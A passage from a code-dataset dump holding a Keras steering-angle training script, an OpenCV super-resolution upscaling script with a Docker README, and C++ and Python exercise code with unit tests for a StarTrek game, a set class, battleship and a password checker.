"repo_name": "flyflo86/Clone",
"src_encoding": "UTF-8",
"text": "import csv\r\nimport cv2\r\nimport numpy as np\r\n#import keras\r\nfrom os.path import split\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout\r\nfrom keras.callbacks import ModelCheckpoint, Callback\r\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\r\n\r\n\r\n\r\nbatch_size_generator = 128\r\n#resized image dimension in training\r\n#img_rows = 66\r\n#img_cols = 200\r\nimg_rows = 66\r\nimg_cols = 200\r\n\r\nangle_threshold = 3.0\r\n\r\ndef display_image(image):\r\n# cv2.imshow('image',image)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\n plt.figure()\r\n plt.imshow(image)\r\n\r\ndef prepro_image(image):\r\n # cropping the image (upper and lower part don't contain important information)\r\n adapted_image = image[60:140,:,:]\r\n # apply subtle blur\r\n #adapted_image = cv2.GaussianBlur(adapted_image, (3,3), 0)\r\n # Scaling to shape input of model is expecting (200x66)\r\n adapted_image = cv2.resize(adapted_image,(img_cols, img_rows), interpolation = cv2.INTER_AREA)\r\n # Converting to YUV \r\n #adapted_image = cv2.cvtColor(adapted_image, cv2.COLOR_RGB2YUV)\r\n return adapted_image\r\n\r\n\r\n#*****************************DATA PREPARATION*******************************************\r\nlines=[]\r\n#with open('../data/driving_log.csv') as file:\r\nwith open('data_downloaded/driving_log.csv') as csvfile:\r\n reader=csv.reader(csvfile)\r\n for line in reader:\r\n lines.append(line)\r\n\r\n#Current Path\r\ndef current_path(image_direction, line):\r\n source_path = line[image_direction]\r\n filename = split(source_path)[1]\r\n current_path = './data_downloaded/IMG/' + filename\r\n# current_path = '../data/IMG/' + filename\r\n return current_path \r\n\r\ndef generate_training_path_sources(lines):\r\n image_paths, angles = [], []\r\n for line in lines:\r\n current_path_center = current_path(0,line)\r\n current_path_right = current_path(1,line)\r\n current_path_left = current_path(2,line)\r\n steering_center = float(line[3])\r\n # create adjusted steering measurements for the side camera images\r\n correction = 0.25 # this is a parameter to tune\r\n steering_left = steering_center + correction\r\n steering_right = steering_center - correction\r\n image_paths.append(current_path_center)\r\n image_paths.append(current_path_left)\r\n image_paths.append(current_path_right)\r\n angles.append(steering_center)\r\n angles.append(steering_left)\r\n angles.append(steering_right)\r\n \r\n return image_paths, angles\r\n\r\n#*********************Training Data Generator*************************************************\r\n\r\n\r\ndef estimate_samples_per_epoch(angles):\r\n counter=0\r\n for i in range(len(angles)):\r\n counter = counter+1\r\n angle = angles[i]\r\n # Data Augmentation: if steering angle is above a certain threshold, the image is flipped horizontally and also added to the training data\r\n if abs(angle) > angle_threshold:\r\n counter = counter+1\r\n return counter\r\n\r\n\r\n\r\n#Reading Data from Training Simulator and adding side camera images\r\ndef generate_data_training(image_paths, angles, batch_size_generator):\r\n image_paths, angles = shuffle(image_paths, angles)\r\n while True: \r\n images,measurements = ([],[])\r\n for i in range(len(angles)):\r\n image = cv2.imread(image_paths[i])\r\n angle = angles[i]\r\n image = prepro_image(image)\r\n images.append(image)\r\n measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n yield (np.array(images), np.array(measurements))\r\n images, measurements = ([],[])\r\n #image_paths, angles = shuffle(image_paths, angles)\r\n # Data Augmentation: if steering angle is above a certain threshold, the image is flipped horizontally and also added to the training data\r\n if abs(angle) > angle_threshold:\r\n image = cv2.flip(image, 1)\r\n angle *= -1\r\n images.append(image)\r\n measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n yield (np.array(images), np.array(measurements))\r\n images, measurements = ([],[])\r\n #image_paths, angles = shuffle(image_paths, angles)\r\ndef generate_data_training_visual(image_paths, angles, batch_size_generator):\r\n image_paths, angles = shuffle(image_paths, angles)\r\n images,measurements = ([],[])\r\n while True: \r\n for i in range(len(angles)):\r\n image = cv2.imread(image_paths[i])\r\n angle = angles[i]\r\n image = prepro_image(image)\r\n images.append(image)\r\n measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n return (np.array(images), np.array(measurements))\r\n\r\n # Data Augmentation: if steering angle is above a certain threshold, the image is flipped horizontally and also added to the training data\r\n if abs(angle) > angle_threshold:\r\n image = cv2.flip(image, 1)\r\n angle *= -1\r\n images.append(image)\r\n measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n return (np.array(images), np.array(measurements))\r\n\r\n \r\n#**********Splitting Data in Train/Test*******************\r\nimage_paths, angles = generate_training_path_sources(lines)\r\nsamples_per_epoch = estimate_samples_per_epoch(angles)\r\nimage_paths_train, image_paths_test, angles_train, angles_test = train_test_split(image_paths, angles, test_size=0.2, random_state=42)\r\nimages, measurements = generate_data_training_visual(image_paths,angles,batch_size_generator)\r\n\r\nsize_train=np.array(image_paths_train).shape[0] \r\nsize_test=np.array(image_paths_test).shape[0] \r\n \r\nprint('Train Dataset size:', np.array(image_paths_train).shape, np.array(angles_train).shape)\r\nprint('Test Dataset size:', np.array(image_paths_test).shape, np.array(angles_test).shape)\r\nprint('Image SHAPE:', images[0].shape)\r\n\r\n\r\n#*********************************Visualizing DATA******************************************\r\n#display_image(images[1])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#************************Model*********************************************************\r\nTraining_Mode=True \r\nif Training_Mode==True:\r\n# \r\n# model = Sequential([\r\n#\t\t\tLambda(lambda x: x/127.5 - 1.,input_shape=(img_rows,img_cols,3)),\r\n#\t\t\tConvolution2D(2, 3, 3, border_mode='valid', input_shape=(img_rows,img_cols,3), activation='relu'),\r\n#\t\t\tMaxPooling2D((4,4),(4,4),'valid'),\r\n#\t\t\tDropout(0.25),\r\n#\t\t\tFlatten(),\r\n#\t\t\tDense(1)\r\n#\t\t])\r\n#\r\n# print(model.summary())\r\n\r\n \r\n model = Sequential()\r\n \r\n model.add(Lambda(lambda x: x / 127.5-1.0, input_shape=(img_rows,img_cols,3)))\r\n #model.add(Cropping2D(cropping=((70,25),(0,0))))\r\n model.add(Convolution2D(24,5,5,subsample=(2,2),activation=\"relu\"))\r\n model.add(Convolution2D(36,5,5,subsample=(2,2),activation=\"relu\"))\r\n model.add(Convolution2D(48,5,5,subsample=(2,2),activation=\"relu\"))\r\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\r\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\r\n model.add(Flatten())\r\n model.add(Dense(100))\r\n model.add(Dense(50))\r\n model.add(Dense(10))\r\n model.add(Dense(1))\r\n #************************Training the Model**********************************************\r\n epochs=12\r\n #Compile the Model\r\n model.compile(loss='mse', optimizer='adam')\r\n # initializing Generators\r\n train_data_gen = generate_data_training(image_paths_train, angles_train, batch_size_generator)\r\n val_data_gen = generate_data_training(image_paths_test, angles_test, batch_size_generator)\r\n test_data_gen = generate_data_training(image_paths_test, angles_test, batch_size_generator)\r\n\r\n checkpoint = ModelCheckpoint('model{epoch:02d}.h5')\r\n\r\n history_object = model.fit_generator(train_data_gen, validation_data=val_data_gen, samples_per_epoch = samples_per_epoch, nb_epoch = epochs, verbose=1, callbacks=[checkpoint], nb_val_samples=size_train)\r\n \r\n print('Test Loss:', model.evaluate_generator(test_data_gen, batch_size_generator))\r\n\r\n print(model.summary())\r\n \r\n model.save('model.h5')\r\n \r\n # Visualizing Predictions\r\n number_predictions = 6\r\n X_test, y_test = generate_data_training_visual(image_paths_test, angles_test, 6)\r\n y_pred = model.predict(X_test, number_predictions, verbose=2)\r\n \r\n \r\n \r\n #**********************Visualizing the training performance*******************************\r\n ### print the keys contained in the history object\r\n print(history_object.history.keys())\r\n \r\n ### plot the training and validation loss for each epoch\r\n plt.plot(history_object.history['loss'])\r\n plt.plot(history_object.history['val_loss'])\r\n plt.title('model mean squared error loss')\r\n plt.ylabel('mean squared error loss')\r\n plt.xlabel('epoch')\r\n plt.legend(['training set', 'validation set'], loc='upper right')\r\n plt.show() "
}
] | 1 |
bobbigmac/superres_with_docker
|
https://github.com/bobbigmac/superres_with_docker
|
481689c2441a6a1d508a4b6682491d223e7dde46
|
101046e4760295dda81d184a8adac23ec228aa97
|
f27b5098c107011ceeb2245e4de14c20034d1730
|
refs/heads/master
| 2022-07-02T06:24:28.363846 | 2020-05-15T00:40:10 | 2020-05-15T00:40:10 | 263,455,115 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7313253283500671,
"alphanum_fraction": 0.7566264867782593,
"avg_line_length": 26.700000762939453,
"blob_id": "06f0718d36164d22a2aa7f7480b97d6848d3c812",
"content_id": "482dfb7f181f6da388dfdab82c55b2141ea72865",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 830,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 30,
"path": "/test-upsize.py",
"repo_name": "bobbigmac/superres_with_docker",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom cv2 import dnn_superres\n\n# Create an SR object\nsr = dnn_superres.DnnSuperResImpl_create()\n\n#TODO: Colour correct, autolevel, convert to png\n\n# Read image\nimage = cv2.imread('/test/images/frame1.png')\n# image = cv2.imread('/test/images/smol3.png')\n\n# Read the desired model\npath = \"/test/models/model1/EDSR_x2.pb\"\nsr.readModel(path)\n\n# Set the desired model and scale to get correct pre- and post-processing\nsr.setModel(\"edsr\", 2)\n\n# Upscale the image\nresult = sr.upsample(image)\n\n# Save the image\ncv2.imwrite(\"/test/images/frame1upscaled.png\", result)\n#cv2.imwrite(\"/test/images/art1up2.jpg\", result)\n\n#TODO potrace to vector\n#TODO maybe useful https://gist.github.com/zph/2494870\n#TODO maybe useful https://github.com/unpaper/unpaper\n#TODO maybe useful http://www.fmwconcepts.com/imagemagick/textcleaner/index.php"
},
{
"alpha_fraction": 0.7438316345214844,
"alphanum_fraction": 0.7612481713294983,
"avg_line_length": 54.15999984741211,
"blob_id": "86d8c1dc3744fea35c1fd95c042df21fdbb9e7ef",
"content_id": "ad73786df330095f34471cb9b96ad4feeb35235a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 25,
"path": "/README.md",
"repo_name": "bobbigmac/superres_with_docker",
"src_encoding": "UTF-8",
"text": "# Docker image\n\nInstall [docker_python-opencv-ffmpeg](https://github.com/Borda/docker_python-opencv-ffmpeg), then run as below.\n\nSee [Deep Learning based Super Resolution with OpenCV](https://towardsdatascience.com/deep-learning-based-super-resolution-with-opencv-4fd736678066)\n\n# Run\n\n```\ndocker run -v /home/bobbigmac/projects/a_demos/opencv/:/test/ --rm -it python-opencv-ffmpeg:py36 python /test/test-upsize.py\ndocker run -v G:\\\\projects\\\\opencv:/test/ --rm -it python-opencv-ffmpeg:py36 python /test/test-upsize.py\n```\n\n# Models\n\nThere are currently 4 different SR models supported in the module. They can all upscale images by a scale of 2, 3 and 4. LapSRN can even upscale by a factor of 8. They differ in accuracy, size and speed.\n\n- EDSR [1]. This is the best performing model. However, it is also the biggest model and therefor has the biggest file size and slowest inference. You can download it here.\n- ESPCN [2]. This is a small model with fast and good inference. It can do real-time video upscaling (depending on image size). You can download it here.\n- FSRCNN [3]. This is also small model with fast and accurate inference. Can also do real-time video upscaling. You can download it here.\n- LapSRN [4]. This is a medium sized model that can upscale by a factor as high as 8. You can download it here.\n\n# TODO\n\n- Need imput parameters and multiple model switching"
}
] | 2 |
driscollis/labs-cpp-gtest
|
https://github.com/driscollis/labs-cpp-gtest
|
45c75a3703073ab0759e19be29df5ff96e236567
|
733706b15ec668ac15fbbf4ee6b40e05241663b2
|
172a63469cf87b40492014c26b825ed00b4e4d8a
|
refs/heads/master
| 2021-10-24T06:34:51.728417 | 2017-03-09T20:57:07 | 2017-03-09T20:57:07 | 84,127,136 | 0 | 0 | null | 2017-03-06T22:23:16 | 2016-05-20T11:18:53 | 2016-05-20T11:18:49 | null |
[
{
"alpha_fraction": 0.5218181610107422,
"alphanum_fraction": 0.5490909218788147,
"avg_line_length": 12.75,
"blob_id": "0f0c433ce3619c9db7378d755ce53f77eb2b6bf6",
"content_id": "dffe4f3d7eab8608bff61e4f7c242626b93e9c25",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 550,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 40,
"path": "/MessTrek/src/StarTrek/Klingon.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef KLINGON_HEADER\n#define KLINGON_HEADER\n\n\n#include <cstdlib>\n#include <time.h>\n\nnamespace StarTrek {\n\nclass Klingon {\nprivate:\n int distance_;\n int energy_;\n\npublic:\n Klingon() {\n srand(time(NULL));\n distance_ = (100 + rand() % 4000);\n energy_ = (1000+ rand() % 2000);\n }\n\n virtual int distance() {\n return distance_;\n }\n\n virtual int energy() {\n return energy_;\n }\n\n virtual void energy(int value) {\n energy_ = value;\n }\n\n virtual void destroy() {\n }\n\n};\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.5966330170631409,
"alphanum_fraction": 0.6074073910713196,
"avg_line_length": 26.0181827545166,
"blob_id": "d4b0131afdc2178e06bef275996c5b54d5a93d31",
"content_id": "abc1b0b1878f79590eb0d34511cd1b38f89d138a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1485,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 55,
"path": "/pyset/setlisttest.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import pysetlist\n\nimport unittest\n\nclass TestPySet(unittest.TestCase):\n\n def setUp(self):\n self.my_set = pysetlist.Set()\n\n def test_set_empty(self):\n self.assertFalse(self.my_set.internal_list)\n\n def test_append(self):\n self.my_set.append(5)\n self.assertIn(5, self.my_set)\n\n def test_cannot_append_zero(self):\n \"\"\"\n Tests that we can't add zero to the set\n Also checks that the set remains empty\n \"\"\"\n self.my_set.append(0)\n self.assertNotIn(0, self.my_set)\n self.assertFalse(self.my_set.internal_list)\n\n def test_cannot_add_negative_numbers(self):\n self.my_set.append(-1)\n self.assertNotIn(-1, self.my_set)\n\n def test_cannot_add_same_item_twice(self):\n self.my_set.append(1)\n self.my_set.append(1)\n self.assertNotEqual(self.my_set.count(1), 2)\n self.assertEqual(self.my_set.count(1), 1)\n\n def test_remove_item(self):\n \"\"\"\n Tests that after adding and removing a single item, the\n set is empty\n \"\"\"\n self.my_set.append(1)\n self.my_set.remove(1)\n self.assertFalse(self.my_set.internal_list)\n\n def test_empty_intersections(self):\n my_set2 = pysetlist.Set()\n self.my_set.intersection(my_set2.internal_list)\n self.assertFalse(self.my_set.internal_list)\n\n def tearDown(self):\n self.my_set = None\n del self.my_set\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.698113203048706,
"alphanum_fraction": 0.698113203048706,
"avg_line_length": 14.142857551574707,
"blob_id": "b2ef4dedf666c0d447a2f0ef40fb35ee9c39c79f",
"content_id": "9297a9641dc44ba25911f076f8070d5a58f4cb9f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 7,
"path": "/TestedTrek/TestedTrek/src/StarTrek/RandGenerator.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"RandGenerator.h\"\n\nRandom generator;\n\nint rnd(int maximum) {\n return generator() % maximum;\n}\n"
},
{
"alpha_fraction": 0.6515581011772156,
"alphanum_fraction": 0.6827195286750793,
"avg_line_length": 12.576923370361328,
"blob_id": "aa7c759f6f66fc6e145a219b17b44c22179c25ab",
"content_id": "de3b0dc73c0642e081e8ae1249e0e01ef557e2d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 353,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 26,
"path": "/TestedTrek/TestedTrek/src/StarTrek/PhotonTorpedo.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"PhotonTorpedo.h\"\n\n#include \"RandGenerator.h\"\n\nnamespace StarTrek\n{\n\nPhotonTorpedo::PhotonTorpedo()\n{\n}\n\nPhotonTorpedo::~PhotonTorpedo()\n{\n}\n\nint PhotonTorpedo::getPhotonTorpDamage()\n{\n return 800 + rnd(50);\n}\n\nbool PhotonTorpedo::didTorpedoHit( int distance )\n{\n return (rnd(4) + ((distance / 500) + 1) <= 7);\n}\n\n} // namespace StarTrek\n"
},
{
"alpha_fraction": 0.5569307208061218,
"alphanum_fraction": 0.6225247383117676,
"avg_line_length": 26.89655113220215,
"blob_id": "1dc7314faf912d390fa00bbda778ff2a53ec28a1",
"content_id": "fd2e83631e05844c1282a4df195e93d067a37310",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 808,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 29,
"path": "/battleship/bui.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import arcade\n\narcade.open_window(\"Battleship\", 600, 600)\n\narcade.set_background_color(arcade.color.WHITE)\n\narcade.start_render()\n\n# Draw a grid\n# Draw vertical lines every 120 pixels\ntext_offset = 500\nrow_number = 1\narcade.draw_text(\"Simple line of text in 12 point\", 50, 50, arcade.color.BLACK, 12)\nfor x in range(0, 661, 60):\n arcade.draw_line(x, 0, x, 600, arcade.color.BLACK, 2)\n arcade.draw_text(text=\"{}\".format(row_number), \n start_x=40, \n start_y=text_offset, \n color=arcade.color.BLACK,\n font_size=12)\n text_offset -= 50\n row_number += 1\n\n# Draw horizontal lines every 200 pixels\nfor y in range(0, 661, 60):\n arcade.draw_line(0, y, 800, y, arcade.color.BLACK, 2)\n \narcade.finish_render()\narcade.run()"
},
{
"alpha_fraction": 0.6585366129875183,
"alphanum_fraction": 0.6707317233085632,
"avg_line_length": 21.363636016845703,
"blob_id": "0af832b97c71d80790857a49632310c14482db96",
"content_id": "632403a359d3500ab4f93c13f61f23cb544012bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 492,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 22,
"path": "/LunEx/src/stockquote.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"LunExServices.h\"\n#include \"stockquote.h\"\n\nStockQuote::StockQuote( std::string symbol, LunExServices& service )\n : m_symbol( symbol ), m_service( service )\n{\n m_price = m_service.currentPrice( m_symbol.c_str() );\n}\n\ndouble StockQuote::Price( double shares ) const\n{\n return shares * m_price;\n}\n\ndouble StockQuote::Total( double shares ) const\n{\n double subtotal, total;\n subtotal = shares * m_price;\n total = subtotal + subtotal * 0.02 + 10.0;\n\n return total;\n}\n"
},
{
"alpha_fraction": 0.7112461924552917,
"alphanum_fraction": 0.7112461924552917,
"avg_line_length": 20.45652198791504,
"blob_id": "2e2773626b5436c0063cb26f25585272f2b7254c",
"content_id": "8b4c2b40991ca5a4172b9c84aa0e4015cc8b5270",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 987,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 46,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Game.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef GAME_HEADER\n#define GAME_HEADER\n\n\n#include <Untouchables/WebGadget.h>\n\n#include \"Phaser.h\"\n#include \"PhotonTorpedo.h\"\n#include \"RandGenerator.h\"\n\nnamespace StarTrek {\n\nclass Galaxy;\nclass Klingon;\n\nclass Game {\nprivate:\n int phaser_ammo;\n int photon_torpedos;\n\n Phaser m_phaser;\n PhotonTorpedo m_photon_torp;\n\n void hitKlingon( Klingon* enemy, int damage, Galaxy& galaxy );\n\n bool hasEnoughPhaserAmmo( int amount );\n bool hasEnoughPhotoTorpedos();\n void reducePhaserAmmo( int amount );\n void reducePhotoTorpedos();\n void photonTorpedoMissed( int distance, Galaxy& galaxy );\n\n void attackWithPhaser( Klingon* enemy, int amount, int distance, Galaxy& galaxy );\n void attackPhotonTorpedo( Klingon* enemy, int distance, Galaxy& galaxy );\n\npublic:\n Game();\n void fireWeapon(Untouchables::WebGadget* wg);\n void fireWeapon(Galaxy& galaxy);\n int energyRemaining(void);\n void torpedoes(int value);\n int torpedoes(void);\n};\n\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.4951612949371338,
"alphanum_fraction": 0.4951612949371338,
"avg_line_length": 24.77083396911621,
"blob_id": "4023021bc8a84a08a88897d2069787bf5575c42b",
"content_id": "3672121932a880153cfe33570eec5cde0a0c8364",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1240,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 48,
"path": "/pyset/pyset.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class Set(object):\n \n def __init__(self):\n self.storage = []\n \n def is_empty(self):\n if self.storage:\n return False\n else:\n return True\n \n def append(self, item):\n if isinstance(item, list):\n for i in item:\n self.storage.append(i)\n else:\n self.storage.append(item)\n \n def __iter__(self):\n if not self.storage:\n raise StopIteration\n for item in self.storage:\n yield item\n \n def __contains__(self, item):\n if item in self.storage:\n return True\n \n def __eq__(self, other_list):\n if len(self.storage) != len(other_list):\n return False\n for i in range(len(other_list)):\n if other_list[i] not in self.storage:\n return False\n return True\n #return set(self.storage) == set(other_list)\n \n def __ne__(self, other_list):\n return not self.__eq__(other_list)\n \n def __len__(self):\n return len(self.storage)\n \n def __getitem__(self, index):\n return self.storage[index]\n \n def __repr__(self):\n return '<Set: {}>'.format(str(self.storage))\n "
},
{
"alpha_fraction": 0.5434831976890564,
"alphanum_fraction": 0.5555809140205383,
"avg_line_length": 27.828947067260742,
"blob_id": "b8435d2bd73fee9740dfa4b00d1204751a6a5610",
"content_id": "5b6489942965b1a9404be38ef043ed9cab95d910",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4381,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 152,
"path": "/battleship/tests.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import game\nimport playermap\nimport player\nimport ship\n\nimport unittest\n\nSHIPS = {'Aircraft carrier': 5,\n 'Battleship': 4,\n 'Cruiser': 3,\n 'Destroyer': 2,\n 'Submarine': 1\n }\n\nclass TestSingleShip(unittest.TestCase):\n \n def test_number_of_ship_types(self):\n s = ship.Ship('Battleship')\n self.assertEqual(len(s.ships), len(SHIPS))\n \n def test_cannot_add_new_ship(self):\n with self.assertRaises(ship.InvalidBoat):\n ship.Ship('U-boat')\n \n def test_ship_create(self):\n for boat in SHIPS:\n s = ship.Ship(boat)\n self.assertEqual(SHIPS[boat], s.ships[boat])\n \n def test_ship_initial_damage(self):\n for boat in SHIPS:\n s = ship.Ship(boat)\n self.assertEqual(s.hit_count, 0)\n \n def test_ship_take_damage(self):\n for boat in SHIPS:\n s = ship.Ship(boat)\n s.it_hit()\n self.assertEqual(s.hit_count, 1)\n \n def test_ship_destroy_submarine(self):\n s = ship.Ship('Submarine')\n s.it_hit()\n self.assertTrue(s.isDestroyed())\n \n def test_ship_destroy_battleship(self):\n s = ship.Ship('Battleship')\n for cnt in range(s.ships['Battleship']):\n s.it_hit()\n self.assertTrue(s.isDestroyed())\n\n \nclass TestMap(unittest.TestCase):\n \n def test_map_correct_size(self):\n m = playermap.Map()\n self.assertEqual(m.size, 10)\n \n def test_map_location_valid(self):\n m = playermap.Map()\n self.assertTrue(m.valid(1,1))\n\n def test_map_is_attack(self):\n m = playermap.Map()\n m.attack(1,1)\n self.assertTrue(m.isHit(1,1))\n \n def test_map_attack_out_of_bounds(self):\n m = playermap.Map()\n with self.assertRaises(playermap.OutOfBounds):\n m.attack(11,11)\n \n def test_map_unattacked_not_hit(self):\n m = playermap.Map()\n self.assertFalse(m.isHit(1,1))\n \n \nclass TestPlayer(unittest.TestCase):\n \n def test_valid_ship_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n self.assertTrue(p.check_location(s, direction, 1, 2))\n \n def test_invalid_ship_start_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n self.assertFalse(p.check_location(s, direction, 100, 100))\n \n def test_invalid_ship_end_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n self.assertFalse(p.check_location(s, direction, 10, 10))\n \n def test_valid_first_ship_placement(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n p.place_ship(s, direction, 1, 1)\n self.assertIn((1,1), m.ship_locations)\n \n def test_overlapping_ship_placement(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n p.place_ship(s, direction, 1, 1)\n self.assertFalse(p.check_location(s, direction, 1, 1))\n \n def test_attack_occupied_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Submarine')\n direction = 'H'\n \n p.place_ship(s, direction, 1, 1)\n self.assertTrue(p.attack(1, 1))\n \nclass TestGame(unittest.TestCase):\n \n def test_game_board_size(self):\n g = game.Game()\n self.assertEqual(g.board_size, 10)\n \n def test_game_number_players(self):\n g = game.Game()\n self.assertEqual(g.number_players, 2)\n \n def test_valid_ship_list(self):\n g = game.Game()\n ships = g.generate_ship_list()\n ship_types = [boat.type for boat in ships]\n self.assertEqual(1, ship_types.count('Aircraft carrier'))\n self.assertEqual(1, ship_types.count('Battleship'))\n self.assertEqual(1, ship_types.count('Cruiser'))\n self.assertEqual(2, ship_types.count('Destroyer'))\n self.assertEqual(2, ship_types.count('Submarine'))\n \nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.5588382482528687,
"alphanum_fraction": 0.5683525204658508,
"avg_line_length": 31.225807189941406,
"blob_id": "6d6c724bfb6a58700379e17892e371129ec448f7",
"content_id": "0b80648e145bd368a7bc43e153ebc57b443d7df6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1997,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 62,
"path": "/password_tester/password_test.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import password\n\nimport unittest\n\nclass TestPassword(unittest.TestCase):\n \n def test_greater_than_seven(self):\n pw = '123'\n \n self.assertIn('TooShortException', password.check(pw))\n \n def test_admin_greater_than_ten(self):\n pw = '12345678'\n \n self.assertIn('AdminTooShortException', password.check(pw, admin=True) )\n \n def test_contain_no_alphabet_char(self):\n pw = '12345678'\n \n self.assertIn('NoAlphabeticException', password.check(pw))\n \n def test_contain_no_digit(self):\n pw = 'abcdefgh'\n \n self.assertIn('NoDigitException', password.check(pw))\n \n def test_valid_password(self):\n pw = 'abcdefg7'\n \n self.assertEqual( set(), password.check( pw ) )\n \n def test_admin_does_not_contain_special(self):\n pw = 'abc123def456'\n \n self.assertIn('AdminNoSpecialCharacterException', password.check(pw, admin=True))\n \n def test_admin_last_char_is_not_special(self):\n pw = 'abc!23def45a'\n \n self.assertIn('AdminLastCharacterIsNotSpecialOrNumber', password.check(pw, admin=True))\n \n def test_valid_admin_password(self):\n pw = 'abc123def456!'\n \n self.assertEqual(set(), password.check(pw, admin=True))\n \n def test_all_errors(self):\n pw = ''\n \n self.assertEqual(set(['TooShortException', 'NoAlphabeticException', 'NoDigitException']),\n password.check(pw))\n \n def test_all_admin_errors(self):\n pw = ''\n \n self.assertEqual(set(['AdminTooShortException', 'TooShortException', 'NoAlphabeticException', \n 'NoDigitException', 'AdminNoSpecialCharacterException', \n 'AdminLastCharacterIsNotSpecialOrNumber']),\n password.check(pw, admin=True))\n \nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.6282722353935242,
"alphanum_fraction": 0.6623036861419678,
"avg_line_length": 13.148148536682129,
"blob_id": "cdb0b90ad8a88c9d4960867163fb8f7a582c6079",
"content_id": "d6d11383ba7a70575b2a097074580a2bea2e268b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 382,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 27,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Phaser.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"Phaser.h\"\n\n#include <algorithm>\n\n#include \"RandGenerator.h\"\n\nnamespace StarTrek\n{\nPhaser::Phaser()\n{\n}\n\nPhaser::~Phaser()\n{\n}\n\nbool Phaser::arePhasersInRange( int distance )\n{\n return distance <= 4000;\n}\n\nint Phaser::getPhaserDamage( int amount, int distance )\n{\n return std::max( 1, amount - (((amount /20)* distance /200) + rnd(200)) );\n}\n\n} // namespace StarTrek\n"
},
{
"alpha_fraction": 0.5057142972946167,
"alphanum_fraction": 0.5142857432365417,
"avg_line_length": 27.040000915527344,
"blob_id": "883ab050c59f37ca1bab9cd7dd0834a560e76aa8",
"content_id": "fbd910460d8bcd437669c813cae5d9c5d8ebf1b6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
